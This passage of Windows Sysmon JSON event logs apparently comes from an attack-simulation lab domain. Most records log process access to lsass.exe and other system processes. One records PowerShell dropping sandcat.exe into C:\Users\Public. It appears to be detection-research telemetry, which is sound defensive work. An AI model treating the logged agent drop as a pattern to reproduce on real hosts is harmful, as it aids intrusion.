06:49:03.678","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1014,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:03.709\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:03.709","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1015,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:03.709\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:03.709","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1016,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:03.709\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:03.709","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1017,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:03.787\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+6d83|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:03.787","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+6d83|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1018,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:03.787\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:03.787","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":1019,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 06:49:04.271\r\nProcessGuid: {E2A3D6B1-105B-5F25-0000-0010773D0100}\r\nProcessId: 2160\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Public\\sandcat.exe\r\nCreationUtcTime: 2020-08-01 06:49:04.271","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 06:49:04.271","ProcessGuid":"{E2A3D6B1-105B-5F25-0000-0010773D0100}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Public\\sandcat.exe","CreationUtcTime":"2020-08-01 06:49:04.271","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1020,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.318\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.318","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1021,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.318\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.318","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1022,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.318\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: 